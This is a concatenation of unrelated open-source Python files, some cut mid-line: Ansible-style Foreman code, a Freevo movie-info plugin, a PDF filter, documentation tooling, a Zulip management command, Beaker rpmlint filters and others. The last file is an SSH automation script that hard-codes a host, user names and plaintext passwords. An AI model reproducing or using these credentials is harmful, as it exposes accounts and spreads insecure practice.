content_view = self._entities.ContentView(self._server, name=name, organization=org)
response = content_view.search()
if len(response) == 1:
return response[0]
else:
self._module.fail_json(msg="No Content View found for %s" % name)
def organization(self, params):
name = params['name']
del params['name']
org = self.find_organization(name, **params)
if org:
org = self._entities.Organization(self._server, name=name, id=org.id, **params)
org.update()
else:
org = self._entities.Organization(self._server, name=name, **params)
org.create()
return True
def manifest(self, params):
org = self.find_organization(params['organization'])
params['organization'] = org.id
try:
file = open(os.getcwd() + params['content'], 'r')
content = file.read()
finally:
file.close()
manifest = self._entities.Subscription(self._server)
try:
manifest.upload(
data={'organization_id': org.id},
files={'content': content}
)
return True
except Exception as e:
if "Import is the same as existing data" in e.message:
return False
else:
self._module.fail_json(msg="Manifest import failed with %s" % to_native(e),
exception=traceback.format_exc())
def product(self, params):
org = self.find_organization(params['organization'])
params['organization'] = org.id
product = self._entities.Product(self._server, **params)
response = product.search()
if len(response) == 1:
product.id = response[0].id
product.update()
else:
product.create()
return True
def sync_product(self, params):
org = self.find_organization(params['organization'])
product = self.find_product(params['name'], org.name)
return product.sync()
def repository(self, params):
product = self.find_product(params['product'], params['organization'])
params['product'] = product.id
del params['organization']
repository = self._entities.Repository(self._server, **params)
repository._fields['organization'] = entity_fields.OneToOneField(entities.Organization)
repository.organization = product.organization
response = repository.search()
if len(response) == 1:
repository.id = response[0].id
repository.update
|
freevo/freevo1
|
src/video/plugins/filmaffinity.py
|
Python
|
gpl-2.0
| 23,935
| 0.007312
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------
# Plugin for FILMAFFINITY support
# -----------------------------------------------------------------------
# $Id$
# Version: 080607_01
#
# Notes: FilmAffinity plugin. You can add FilmAffinity.com informations for video items
# with the plugin
# Activate with: plugin.activate('video.filmaffinity')
# And add the following lines to your configuration file:
# FILMAFFINITY_AUTOACCEPT_SINGLE_HIT = True
# It uses also directly the variables:
# - FILMAFFINITY_REMOVE_FROM_LABEL
# - FILMAFFINITY_REMOVE_FROM_SEARCHSTRING
# as the same words shall be removed also for FilmAffinity.
# You can also set filmaffinity_search on a key (e.g. '1') by setting
# EVENTS['menu']['1'] = Event(MENU_CALL_ITEM_ACTION, arg='filmaffinity_search_or_cover_search')
#
# Todo: - Update existing FXD file
# - DVD/VCD support (discset ??)
#
# Author: S. FABRE for Biboobox, http://www.lahiette.com/biboobox
# RE-Author: Jose Maria Franco Fraiz
#
# -----------------------------------------------------------------------
# Freevo - A Home Theater PC framework
# Copyright (C) 2002 Krister Lagerstrom, et al.
# Please see the file freevo/Docs/CREDITS for a complete list of authors.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MER-
# CHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# ----------------------------------------------------------------------- */
import logging
logger = logging.getLogger("freevo.video.plugins.filmaffinity")
import re
import socket
socket.setdefaulttimeout(30.0)
import urllib2, urlparse, commands
import sys
import os
import traceback
import menu
import config
import plugin
import time
from util import htmlenties2txt
from util import fxdparser
from gui.PopupBox import PopupBox
from util.fxdimdb import makeVideo, point_maker
#beautifulsoup module
from BeautifulSoup import BeautifulSoup
# headers for urllib2
txdata = None
txheaders = {
'User-Agent': 'freevo (%s)' % sys.platform,
'Accept-Language': 'es-es',
}
class PluginInterface(plugin.ItemPlugin):
"""
This plugin obtains movie information in Spanish from the FilmAffinity
website
Configuration::
plugin.activate('video.filmaffinity')
FILMAFFINITY_REMOVE_FROM_LABEL = ('\(.*?\)', '\[.*?\]', 'cd[0-9]+(-[0-9])?', 'title[0-9]+', 'by .*$')
FILMAFFINITY_REMOVE_FROM_SEARCHSTRING = ('spanish','xvid','dvdrip','parte','[0-9]*','dvdscreener','mp3')
FILMAFFINITY_AUTOACCEPT_SINGLE_HIT = True
"""
def __init__(self, license=None):
"""Initialise class instance"""
# these are considered as private variables - don't mess with them unless
# no other choise is given
# fyi, the other choice always exists: add a subroutine or ask :)
if not config.SYS_USE_NETWORK:
|
self.reason = 'SYS_USE_NETWORK not enabled'
return
plugin.ItemPlugin.__init__(self)
def config(self):
return [
('FILMAFFINITY_REMOVE_FROM_LABEL', ('\(.*?\)', '\[.*?\]', 'cd[0-9]+(-[0-9])?', 'title[0-9]+', 'by .*$'), _('Remove matching of this regexps from item name')),
('FILMAFFINITY_REMOVE_FROM_S
|
EARCHSTRING', ('spanish','xvid','dvdrip','parte','[0-9]*','dvdscreener','mp3'), _('Remove matching of this regexps from search string')),
('FILMAFFINITY_AUTOACCEPT_SINGLE_HIT', True, _('Accept search automatically if it has only one result'))
]
def initmyself(self):
self.isdiscset = False
self.title = ''
self.info = {}
self.image = None # full path image filename
self.image_urls = [] # possible image url list
self.image_url = None # final image url
self.fxdfile = None # filename, full path, WITHOUT extension
self.append = False
self.device = None
self.regexp = None
self.mpl_global_opt = None
self.media_id = None
self.file_opts = []
self.video = []
self.variant = []
self.parts = []
self.var_mplopt = []
self.var_names = []
#image_url_handler stuff
self.image_url_handler = {}
def searchFilmAffinity(self, name):
"""name (string), returns id list
Search for name and returns an id list with tuples:
(id , name, year)"""
# Clean internal variables
self.initmyself()
self.filmaffinity_id_list = []
quoted_name = urllib2.quote(name.strip())
regexp_tag = re.compile('<[^>]+>', re.I)
logger.debug('Request with: %s', quoted_name)
url = 'http://www.filmaffinity.com/es/search.php?stext=%s&stype=title' % quoted_name
req = urllib2.Request(url, txdata, txheaders)
searchstring = name
try:
response = urllib2.urlopen(req)
except urllib2.HTTPError, error:
raise FxdFilmaffinity_Net_Error(_('Connection error: ') + error)
exit
regexp_getmultiple = re.compile('.*<b><a href="(/es/film.*\.html)">(.*?)</a></b>\s*\(([0-9]{4})\)\s*', re.I)
regexp_getsingle = re.compile('^<meta name="keywords" content="movie', re.I)
regexp_geturl = re.compile('.*<a href="/es/.*\.php\?movie_id=([0-9]*)',re.I)
multiple = True
for line in response.read().split("\n"):
#print line
if multiple:
mm = regexp_getmultiple.match(line)
if mm:
#print "Found film in line: %s" % line
link = mm.group(1)
name = mm.group(2)
year = mm.group(3)
self.filmaffinity_id_list += [ (link, name, year) ]
ms = regexp_getsingle.match(line)
if ms: multiple = False
else:
mu = regexp_geturl.match(line)
if mu:
link = "/es/film" + mu.group(1) + ".html"
self.filmaffinity_id_list += [ (link, name, '') ]
break
return self.filmaffinity_id_list
def guessFilmAffinity(self, filename, label=False):
"""Guess possible movies from filename. Same return as searchFilmAffinity"""
name = filename
for r in config.FILMAFFINITY_REMOVE_FROM_LABEL:
name = re.sub(r, '', name.lower())
name = vfs.basename(vfs.splitext(name)[0])
name = re.sub('([a-z])([A-Z])', point_maker, name)
name = re.sub('([a-zA-Z])([0-9])', point_maker, name)
name = re.sub('([0-9])([a-zA-Z])', point_maker, name.lower())
name = re.sub(',', ' ', name)
parts = re.split("[\._' -]", name)
name = ''
for p in parts:
if not p.lower() in config.FILMAFFINITY_REMOVE_FROM_SEARCHSTRING and \
not re.search('[^0-9A-Za-z]', p):
# originally: not re.search(p, '[A-Za-z]'):
# not sure what's meant with that
name += '%s ' % p
return self.searchFilmAffinity(name)
def getFilmAffinityPage(self, url):
"""url
Set an filmaffinity number for object, and fetch data"""
self.myurl = 'http://www.filmaffinity.com/' + urllib2.quote(urllib2.unquote(url))
logger.debug("Now trying to get %s", self.myurl)
req = urllib2.Request(self.myurl, txdata, txheaders)
try:
idpage = urllib2.urlopen(req)
except urllib2.HTTPError, er
|
ajmarks/gymnast
|
gymnast/filters/stream_filter.py
|
Python
|
mit
| 2,087
| 0.003833
|
"""
Abstract base class for stream filters
"""
import six
from collections import namedtuple
from warnings import warn
from ..misc import ensure_str, MetaGettable
base = namedtuple('StreamFilter', ('filter_name','decoder', 'EOD', 'encoder'))
base.__new__.__defaults__ = (None, None)
class StreamFilterBase(base):
"""Stream filter class."""
def decode(self, data, **kwargs):
"""Decode the encoded stream. Keyword arguments are the parameters from
the stream dictionary."""
if self.EOD:
end = data.find(bytes(self.EOD))
return self.decoder(data[:end if end > 0 else None], **kwargs)
else:
return self.decoder(data, **kwargs)
def encode(self, data, **kwargs):
"""Encode the stream data. Keyword arguments are the paramete
|
rs from
the stream dictionary."""
if self.encoder:
return self.encoder(data, **kwargs) + (self.EOD if self.EOD else b'')
else:
warn('Encoding for {} not implemented'.format(self.filter_name))
return data + (self.EOD if self.EOD else b'')
@six.add_metaclass(MetaGettable)
class StreamFilter(object):
"""PDF stream filter stream dispatcher. Stream
|
filters are registered by
calling PdfOperation.register() and passing a subclass of StreamFilterBase.
Information on filters at can be found at
https://partners.adobe.com/public/developer/en/ps/sdk/TN5603.Filters.pdf"""
# Nothing to see here. Pay no attention to that man behind the curtain.
_filters = {}
_nop_filter = StreamFilterBase('NOPFilter', lambda x: x)
@classmethod
def register(cls, filter_name, decoder, eod=None, encoder=None):
"""Register a new stream filter"""
new_filt = StreamFilterBase(filter_name, decoder, eod, encoder)
cls._filters[filter_name] = new_filt
@classmethod
def __getitem__(cls, filter_name):
filter_name = ensure_str(filter_name)
try:
return cls._filters[filter_name]
except KeyError:
return cls._nop_filter
|
sebastian-software/jasy
|
jasy/script/api/Data.py
|
Python
|
mit
| 27,459
| 0.00346
|
#
# Jasy - Web Tooling Framework
# Copyright 2010-2012 Zynga Inc.
# Copyright 2013-2014 Sebastian Werner
#
import jasy.script.api.Text as Text
from jasy.script.util import *
import jasy.core.Console as Console
from jasy import UserError
class ApiData():
"""
Container for all relevant API data.
Automatically generated, filled and cached by jasy.item.Script.getApiDocs().
"""
__slots__ = [
"main", "construct", "statics", "properties", "events", "members",
"id",
"package", "basename",
"errors", "size", "assets", "permutations",
"content", "isEmpty",
"uses", "usedBy",
"includes", "includedBy",
"implements", "implementedBy",
"highlight"
]
def __init__(self, id, highlight=True):
self.id = id
self.highlight = highlight
splits = id.split(".")
self.basename = splits.pop()
self.package = ".".join(splits)
self.isEmpty = False
self.uses = set()
self.main = {
"type" : "Unsupported",
"name" : id,
"line" : 1
}
def addSize(self, size):
"""Adds the statistics on different size aspects."""
self.size = size
def addAssets(self, assets):
"""Adds the info about used assets."""
self.assets = assets
def addUses(self, uses):
self.uses.add(uses)
def removeUses(self, uses):
self.uses.remove(uses)
def addFields(self, permutations):
self.permutations = permutations
def scanTree(self, tree):
self.uses.update(tree.scope.shared)
for package in tree.scope.packages:
splits = package.split(".")
current = splits[0]
for split in splits[1:]:
current = "%s.%s" % (current, split)
self.uses.add(current)
try:
if not self.__processTree(tree):
self.main["errornous"] = True
except UserError as myError:
raise myError
except Exception as error:
self.main["errors"] = ({
"line": 1,
"message": "%s" % error
})
self.main["errornous"] = True
self.warn("Error during processing file: %s" % error, 1)
def __processTree(self, tree):
success = False
callNode = findCall(tree, ("core.Module", "core.Interface", "core.Class", "core.Main.declareNamespace"))
if callNode:
callName = getCallName(callNode)
#
# core.Module
#
|
if callName == "core.Module":
self.setMain(callName, callNode.parent, self.id)
staticsMap = getParameterFromCall(callNode, 1)
if staticsMap:
success = True
self.statics = {}
for staticsEntry in staticsMap:
self.addEntry(staticsEntry[0].value, staticsEntry[1], staticsEntry, self.statics)
else:
self.warn("
|
Invalid core.Module()", callNode.line)
#
# core.Interface
#
elif callName == "core.Interface":
self.setMain(callName, callNode.parent, self.id)
configMap = getParameterFromCall(callNode, 1)
if configMap:
success = True
for propertyInit in configMap:
sectionName = propertyInit[0].value
sectionValue = propertyInit[1]
if sectionName == "properties":
self.properties = {}
for propertyEntry in sectionValue:
self.addProperty(propertyEntry[0].value, propertyEntry[1], propertyEntry, self.properties)
elif sectionName == "events":
self.events = {}
for eventEntry in sectionValue:
self.addEvent(eventEntry[0].value, eventEntry[1], eventEntry, self.events)
elif sectionName == "members":
self.members = {}
for memberEntry in sectionValue:
self.addEntry(memberEntry[0].value, memberEntry[1], memberEntry, self.members)
else:
self.warn('Invalid core.Interface section "%s"' % sectionName, propertyInit.line)
else:
self.warn("Invalid core.Interface()", callNode.line)
#
# core.Class
#
elif callName == "core.Class":
self.setMain(callName, callNode.parent, self.id)
configMap = getParameterFromCall(callNode, 1)
if configMap:
success = True
for propertyInit in configMap:
sectionName = propertyInit[0].value
sectionValue = propertyInit[1]
if sectionName == "construct":
self.addConstructor(sectionValue, propertyInit)
elif sectionName == "properties":
self.properties = {}
for propertyEntry in sectionValue:
self.addProperty(propertyEntry[0].value, propertyEntry[1], propertyEntry, self.properties)
elif sectionName == "events":
self.events = {}
for eventEntry in sectionValue:
self.addEvent(eventEntry[0].value, eventEntry[1], eventEntry, self.events)
elif sectionName == "members":
self.members = {}
for memberEntry in sectionValue:
self.addEntry(memberEntry[0].value, memberEntry[1], memberEntry, self.members)
elif sectionName == "include":
self.includes = [valueToString(entry) for entry in sectionValue]
elif sectionName == "implement":
self.implements = [valueToString(entry) for entry in sectionValue]
elif sectionName == "pooling":
# TODO
pass
else:
self.warn('Invalid core.Class section "%s"' % sectionName, propertyInit.line)
else:
self.warn("Invalid core.Class()", callNode.line)
#
# core.Main.declareNamespace
#
elif callName == "core.Main.declareNamespace":
target = getParameterFromCall(callNode, 0)
assigned = getParameterFromCall(callNode, 1)
if target:
success = True
if assigned and assigned.type == "function":
# Use callNode call for constructor, find first doc comment for main documentation
self.setMain("core.Main", findCommentNode(tree), target.value)
self.addConstructor(assigned, callNode.parent)
else:
self.setMain("core.Main", callNode.parent, target.value)
if assigned and assigned.type == "object_init":
self.statics = {}
for staticsEntry in assigned:
self.addEntry(staticsEntry[0].value, staticsEntry[1], staticsEntry, self.statics)
#
# Handle plain JS namespace -> object assignments
#
else:
def assignMatcher(node):
if node.type == "assign" and node[0].type == "dot":
if node[1].type == "object_init":
doc = getDocComment(node.parent)
if not doc is None:
|
levilucio/SyVOLT
|
UMLRT2Kiltera_MM/MT_post__Par.py
|
Python
|
mit
| 9,121
| 0.017542
|
"""
__MT_post__Par.py_____________________________________________________
Automatically generated AToM3 syntactic object (DO NOT MODIFY DIRECTLY)
Author: gehan
Modified: Sun Feb 15 10:31:27 2015
______________________________________________________________________
"""
from ASGNode import *
from ATOM3Type import *
from ATOM3Text import *
from ATOM3S
|
tring import *
from graph_MT_post__Par import *
class MT_post__Par(ASGNode, ATOM3Type):
def __init__(self, parent = None):
ASGNode.__init__(self)
ATOM3Type.__init__(self)
self.superTypes = ['MT_post__Proc', 'MT_post__MetaModelElement_T']
self.graphClass_ = graph_MT_post__Par
self.isGraphObjectVisual = True
if(hasattr(self, '_setHierarchicalLink')):
|
self._setHierarchicalLink(False)
if(hasattr(self, '_setHierarchicalNode')):
self._setHierarchicalNode(False)
self.parent = parent
self.MT_post__cardinality=ATOM3Text('\n#===============================================================================\n# You can access the value of the current node\'s attribute value by: attr_value.\n# If the current node shall be created you MUST initialize it here!\n# You can access a node labelled n by: PreNode(\'n\').\n# To access attribute x of node n, use: PreNode(\'n\')[\'x\'].\n# Note that the attribute values are those before the match is rewritten.\n# The order in which this code is executed depends on the label value\n# of the encapsulating node.\n# The given action must return the new value of the attribute.\n#===============================================================================\n\nreturn attr_value\n', 80,15 )
self.MT_post__cardinality=ATOM3Text('\n#===============================================================================\n# You can access the value of the current node\'s attribute value by: attr_value.\n# If the current node shall be created you MUST initialize it here!\n# You can access a node labelled n by: PreNode(\'n\').\n# To access attribute x of node n, use: PreNode(\'n\')[\'x\'].\n# Note that the attribute values are those before the match is rewritten.\n# The order in which this code is executed depends on the label value\n# of the encapsulating node.\n# The given action must return the new value of the attribute.\n#===============================================================================\n\nreturn attr_value\n', 80,15 )
self.MT_post__classtype=ATOM3Text('\n#===============================================================================\n# You can access the value of the current node\'s attribute value by: attr_value.\n# If the current node shall be created you MUST initialize it here!\n# You can access a node labelled n by: PreNode(\'n\').\n# To access attribute x of node n, use: PreNode(\'n\')[\'x\'].\n# Note that the attribute values are those before the match is rewritten.\n# The order in which this code is executed depends on the label value\n# of the encapsulating node.\n# The given action must return the new value of the attribute.\n#===============================================================================\n\nreturn attr_value\n', 80,15 )
self.MT_post__classtype=ATOM3Text('\n#===============================================================================\n# You can access the value of the current node\'s attribute value by: attr_value.\n# If the current node shall be created you MUST initialize it here!\n# You can access a node labelled n by: PreNode(\'n\').\n# To access attribute x of node n, use: PreNode(\'n\')[\'x\'].\n# Note that the attribute values are those before the match is rewritten.\n# The order in which this code is executed depends on the label value\n# of the encapsulating node.\n# The given action must return the new value of the attribute.\n#===============================================================================\n\nreturn attr_value\n', 80,15 )
self.MT_post__name=ATOM3Text('\n#===============================================================================\n# You can access the value of the current node\'s attribute value by: attr_value.\n# If the current node shall be created you MUST initialize it here!\n# You can access a node labelled n by: PreNode(\'n\').\n# To access attribute x of node n, use: PreNode(\'n\')[\'x\'].\n# Note that the attribute values are those before the match is rewritten.\n# The order in which this code is executed depends on the label value\n# of the encapsulating node.\n# The given action must return the new value of the attribute.\n#===============================================================================\n\nreturn attr_value\n', 80,15 )
self.MT_post__name=ATOM3Text('\n#===============================================================================\n# You can access the value of the current node\'s attribute value by: attr_value.\n# If the current node shall be created you MUST initialize it here!\n# You can access a node labelled n by: PreNode(\'n\').\n# To access attribute x of node n, use: PreNode(\'n\')[\'x\'].\n# Note that the attribute values are those before the match is rewritten.\n# The order in which this code is executed depends on the label value\n# of the encapsulating node.\n# The given action must return the new value of the attribute.\n#===============================================================================\n\nreturn attr_value\n', 80,15 )
self.MT_label__=ATOM3String('', 20)
self.MT_pivotOut__=ATOM3String('', 20)
self.generatedAttributes = {'MT_post__cardinality': ('ATOM3Text', ),
'MT_post__cardinality': ('ATOM3Text', ),
'MT_post__classtype': ('ATOM3Text', ),
'MT_post__classtype': ('ATOM3Text', ),
'MT_post__name': ('ATOM3Text', ),
'MT_post__name': ('ATOM3Text', ),
'MT_label__': ('ATOM3String', ),
'MT_pivotOut__': ('ATOM3String', ) }
self.realOrder = ['MT_post__cardinality','MT_post__cardinality','MT_post__classtype','MT_post__classtype','MT_post__name','MT_post__name','MT_label__','MT_pivotOut__']
self.directEditing = [0,0,0,0,0,0,1,1]
def clone(self):
cloneObject = MT_post__Par( self.parent )
for atr in self.realOrder:
cloneObject.setAttrValue(atr, self.getAttrValue(atr).clone() )
ASGNode.cloneActions(self, cloneObject)
return cloneObject
def copy(self, other):
ATOM3Type.copy(self, other)
for atr in self.realOrder:
self.setAttrValue(atr, other.getAttrValue(atr) )
ASGNode.copy(self, other)
def preCondition (self, actionID, * params):
if self.graphObject_:
return self.graphObject_.preCondition(actionID, params)
else: return None
def postCondition (self, actionID, * params):
if self.graphObject_:
return self.graphObject_.postCondition(actionID, params)
else: return None
def preAction (self, actionID, * params):
if actionID == self.CREATE:
self.autoIncrLabel(params)
if self.graphObject_:
return self.graphObject_.preAction(actionID, params)
else: return None
def postAction (self, actionID, * params):
if self.graphObject_:
return self.graphObject_.postAction(actionID, params)
else: return None
def QOCA(self, params):
"""
QOCA Constraint Template
NOTE: DO NOT select a POST/PRE action trigger
Constraints will be added/removed in a logical manner by other mechanisms.
"""
return # <---- Remove this to use QOCA
""" Get the high level constraint helper and solver """
from Qoca.atom3constraints.OffsetConstraints import OffsetConstraints
oc = OffsetConstraints(self.parent.qocaSolver)
"""
Example constraint, see Kernel/QOCA/atom3constraints/OffsetConstraints.py
For more types of constraints
"""
oc.fixedWidth(self.graphObject_, self.graphObject_.sizeX)
oc.fixedHeight(self.graphObject_, self.graphObject_.sizeY)
|
AlpineNow/python-alpine-api
|
alpine/alpineobject.py
|
Python
|
mit
| 2,190
| 0.002283
|
from __future__ import unicode_literals
from __future__ import absolute_import
import json
import logging
import logging.config
import os
class AlpineObject(object):
"""
Base Class of Alpine API objects
"""
#
# alpine alpine version string
#
_alpine_api_version = "v1"
_min_alpine_version = "6.2"
def __init__(self, base_url=None, session=None, token=None):
self.base_url = base_url
self.session = session
self.token = token
self._setup_logging()
# Get loggers from the configuration files(logging.json) if exists
# For detail, reference logging.json
self.logger = logging.getLogger("debug") # debug
def _add_token_to_url(self, url):
"""
Used internally to properly form URLs.
:param str url: An Alpine API URL
:return: Formatted URL
:rtype str:
"""
return str("{0}?session_id={1}".format(url, self.token))
@staticmethod
def _setup_logging(default_configuration_set
|
ting_file='l
|
ogging.json',
default_level=logging.INFO,
env_key='LOG_CFG'):
"""
Sets internal values for logging through a file or an environmental variable
:param str default_configuration_setting_file: Path to logging config file. Will be overwritten by
environment variable if it exists.
:param default_level: See possible levels here: https://docs.python.org/2/library/logging.html#logging-levels
:param str env_key: Name of environment variable with logging setting.
:return: None
"""
path = default_configuration_setting_file
value = os.getenv(env_key, None)
if value:
path = value
else:
pass
if os.path.exists(path):
with open(path, 'rt') as f:
config = json.load(f)
logging.config.dictConfig(config)
else:
logging.basicConfig(level=default_level,
format="%(asctime)s %(name)s %(module)s[%(lineno)d] %(levelname)s: %(message)s")
|
Raukonim/piva
|
prac7_2.py
|
Python
|
gpl-3.0
| 897
| 0.069119
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 22 09:37:42 2015
@author: raukonim
"""
from pylab import *
from scipy.misc import lena
from skimage.
|
data import camera
close("all")
interactive(True)
imfourier=fftshift(fft2(lena()))
dimen=imfourier.shape
x,y=meshgrid(linspace(-1,1,dimen[0]), linspace(-1,1,dimen[1]))
filt=sqrt(x*x+y*y)
passhigh=filt>0.6
passlow=filt<0.15
passband=(passhigh+passlow)==0
result=zeros([dimen[0],dimen[1],3], "complex")
result[:,:,0]=passlow*imfourier
result[:,:,1]=passband*imfourier
result[:,:,
|
2]=passhigh*imfourier
iresult=zeros([dimen[0],dimen[1],3], "complex")
iresult[:,:,0]=ifft2(result[:,:,0])
iresult[:,:,1]=ifft2(result[:,:,1])
iresult[:,:,2]=ifft2(result[:,:,2])
filtrada=abs(iresult)
filtrada[:,:,0]/=filtrada[:,:,0].max()
filtrada[:,:,1]/=filtrada[:,:,1].max()
filtrada[:,:,2]/=filtrada[:,:,2].max()
"""
figure()
imshow(, cmap='gray')
"""
|
mahim97/zulip
|
zerver/management/commands/realm_emoji.py
|
Python
|
apache-2.0
| 2,486
| 0.001207
|
import sys
from argparse import ArgumentParser, RawTextHelpFormatter
from typing import Any
from django.core.management.base import CommandParser
from zerver.lib.actions import check_add_realm_emoji, do_remove_realm_emoji
from zerver.lib.management import ZulipBaseCommand
class Command(ZulipBaseCommand):
    help = """Manage emoji for the specified realm
Example: ./manage.py realm_emoji --realm=zulip.com --op=add robotheart \\
    https://humbug-user-avatars.s3.amazonaws.com/95ffa70fe0e7aea3c052ba91b38a28d8779f5705
Example: ./manage.py realm_emoji --realm=zulip.com --op=remove robotheart
Example: ./manage.py realm_emoji --realm=zulip.com --op=show
"""

    # Fix support for multi-line usage
    def create_parser(self, *args: Any, **kwargs: Any) -> CommandParser:
        """Return the default parser, with a formatter that keeps the
        newlines in ``help`` above intact."""
        parser = super().create_parser(*args, **kwargs)
        parser.formatter_class = RawTextHelpFormatter
        return parser

    def add_arguments(self, parser: ArgumentParser) -> None:
        """Register --op plus the optional positional name/image-url args."""
        parser.add_argument('--op',
                            dest='op',
                            type=str,
                            default="show",
                            help='What operation to do (add, show, remove).')
        parser.add_argument('name', metavar='<name>', type=str, nargs='?', default=None,
                            help="name of the emoji")
        parser.add_argument('img_url', metavar='<image url>', type=str, nargs='?',
                            help="URL of image to display for the emoji")
        self.add_realm_args(parser, True)

    def handle(self, *args: Any, **options: str) -> None:
        """Dispatch on --op: list, add, or remove a realm emoji.

        Exits 0 on success; prints the command help and exits 1 when a
        required argument for the chosen operation is missing.
        """
        realm = self.get_realm(options)
        assert realm is not None  # Should be ensured by parser
        if options["op"] == "show":
            for name, url in realm.get_emoji().items():
                print(name, url)
            sys.exit(0)
        name = options['name']
        if name is None:
            self.print_help("./manage.py", "realm_emoji")
            sys.exit(1)
        if options["op"] == "add":
            img_url = options['img_url']
            if img_url is None:
                self.print_help("./manage.py", "realm_emoji")
                sys.exit(1)
            check_add_realm_emoji(realm, name, img_url)
            sys.exit(0)
        elif options["op"] == "remove":
            do_remove_realm_emoji(realm, name)
            sys.exit(0)
        else:
            # Unknown --op value: show usage and fail.
            self.print_help("./manage.py", "realm_emoji")
            sys.exit(1)
|
beaker-project/beaker
|
Misc/rpmlint-config.py
|
Python
|
gpl-2.0
| 3,395
| 0.004418
|
# rpmlint filter configuration for the Beaker packages: each addFilter()
# call below suppresses one specific warning that is expected/intentional.
from Config import addFilter

# It's true, our server-side man pages are deficient
addFilter(r'(beaker-server|beaker-lab-controller)\.noarch: W: no-manual-page-for-binary')
# Kid templates produce a .pyc without a corresponding .py when they are compiled
addFilter(r'python-bytecode-without-source /usr/lib/python.*/site-packages/bkr/server/templates/.*\.pyc')
# We ship the same logrotate config file for both server and lab-controller,
# so it's just called "beaker"
addFilter(r'incoherent-logrotate-file /etc/logrotate\.d/beaker')
# These are intentionally non-world-readable
addFilter(r'non-readable /etc/beaker/server\.cfg')
addFilter(r'non-readable /etc/sudoers\.d/beaker_proxy_clear_netboot')
# These are intentionally non-executable, they are executed on test systems instead
addFilter(r'non-executable-script /usr/share/bkr/lab-controller/(anamon|anamon\.init|anamon\.service)')
# This is intentionally not-executable, they are executed on test systems instead
addFilter(r'non-executable-script /usr/lib/python.*/site-packages/bkr/labcontroller/pxemenu-templates/ipxe-menu')
# This is just an rpmlint bug really - This should be executed by iPXE
addFilter(r'wrong-script-interpreter /usr/lib/python.*/site-packages/bkr/labcontroller/pxemenu-templates/ipxe-menu')
# On RHEL6 bash completions are indeed stored in /etc even though they are not
# config. Newer bash-completion moved this to /usr/lib and the problem goes
# away. So delete this when we're not targetting RHEL6 anymore.
addFilter(r'non-conffile-in-etc /etc/bash_completion\.d/bkr')
# RHEL6-only pid file stuff. Under systemd we should be neither owning, nor
# creating, nor using any of this stuff in /var/run.
addFilter(r'dir-or-file-in-var-run /var/run/(beaker|beaker-lab-controller)')
# This cron job is both executable and configuration intentionally,
# this might be violating some packaging guidelines... need to check.
addFilter(r'executable-marked-as-config-file /etc/cron\.hourly/beaker_expire_distros')
# Fake compose data uses empty hidden files to produce the directory structure
addFilter(r'(zero-length|hidden-file-or-dir) /usr/lib/python.*/site-packages/bkr/inttest/labcontroller/compose_layout/')
# Fake client config included with tests
addFilter(r'hidden-file-or-dir /usr/lib/python.*/site-packages/bkr/inttest/client/.beaker_client')
# We are guilty of using jargon from time to time
addFilter(r'spelling-error.* (netboot|distro|distros)')
# We know what we're doing
addFilter(r'dangerous-command-in-%post rm')
addFilter(r'dangerous-command-in-%preun rm')
# No %doc is okay for these as they depend on other subpackages
addFilter(r'(beaker-lab-controller-addDistro|beaker-integration-tests)\.noarch: W: no-documentation')
# RPMs built from git have no %changelog, the proper ones maintained from dist-git do though
addFilter(r'no-changelogname-tag')
# /dev/null always exists
addFilter(r'dangling-symlink .* /dev/null')
# Our initscripts are okay, rpmlint just can't understand the variable substitution
addFilter(r'incoherent-subsys .* \$prog')
# rpmlint is being a bit preachy (we really don't need or want reload)
addFilter(r'no-reload-entry /etc/init\.d/beakerd')
# We can call our services whatever we want
addFilter(r'incoherent-init-script-name beakerd')
# This is just an rpmlint bug really
addFilter(r'explicit-lib-dependency (libxml2-python|libxslt-python|python-passlib)')
|
eldie1984/Scripts
|
pg/pruebas/prueba_ses.py
|
Python
|
gpl-2.0
| 1,904
| 0.028361
|
import paramiko

# Python 2 script: lists UX sessions on a remote host and, for each
# session, fetches its "upr" attribute over an interactive SSH shell.
#
# NOTE(review): host, user names and passwords are hard-coded below; move
# them out of the source (config file / environment) before sharing.
ses_dict={}
sesiones=[]
upr=[]
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('yvasa850', username='e449806', password='Ema84nue')
chan = ssh.invoke_shell()
# Ssh and wait for the password prompt.
chan.send('su - mwpsyz01 \n')
buff = ''
#i=0
while not 'Password:' in buff:
    resp = chan.recv(9999)
    buff += resp
    # i = i + 1
    # print "%s: %s" %(i,resp)
# if i==20 or resp.endswith('Password:'):
# ssh.close()
# exit()
# Send the password and wait for a prompt.
chan.send('Sam0la\'P\n')
buff = ''
i=0
while not 'mwpsyz01 >' in buff:
    resp = chan.recv(9999)
    buff += resp
    # i = i + 1
    # print "%s: %s" %(i,resp)
# if i==20 or resp.endswith('mwpsyz01 >'):
# ssh.close()
# exit()
#
## Execute whatever command and wait for a prompt again.
# List all sessions as "session|name ..." pairs, one per line.
chan.send('uxlst ses ses=\* | grep -v "Commande" | grep -v "SESSION" | grep -v "\-\-\-" | sed \'/^ *$/d\'|awk \'{print $1"|"$3" "$4" "$5" "$6" "$7" "$8" "$9}\'\n')
buff = ''
while not 'mwpsyz01 >' in buff:
    resp = chan.recv(9999)
    buff += resp
# Now buff has the data I need.
#print 'buff', buff
# Parse the "session|name" lines, skipping echoed commands and prompts.
for sal in buff.split("\n"):
    if sal.find(">") == -1 and sal.find("uxlst") == -1 :
        sal_sp=sal.split('|')
        ses_dict[sal_sp[0]]=sal_sp[1]
        sesiones.append(sal_sp[0])
# print sal_sp
# print "->%s" %sal
#print ses_dict
#ssh.close()
#for key in ses_dict:
# print "Sesion:%s -> Nombre:%s " %(key,ses_dict[key])
# For every session found above, query its "upr" attribute.
for ses in sesiones:
    print ' uxshw ses ses=%s | grep upr | awk \'{print $4}\'\n' % ses
    chan.send(' uxshw ses ses=%s | grep upr | awk \'{print $4}\'\n' % ses)
    buff = ''
    while not 'mwpsyz01 >' in buff:
        resp = chan.recv(9999)
        buff += resp
    print buff
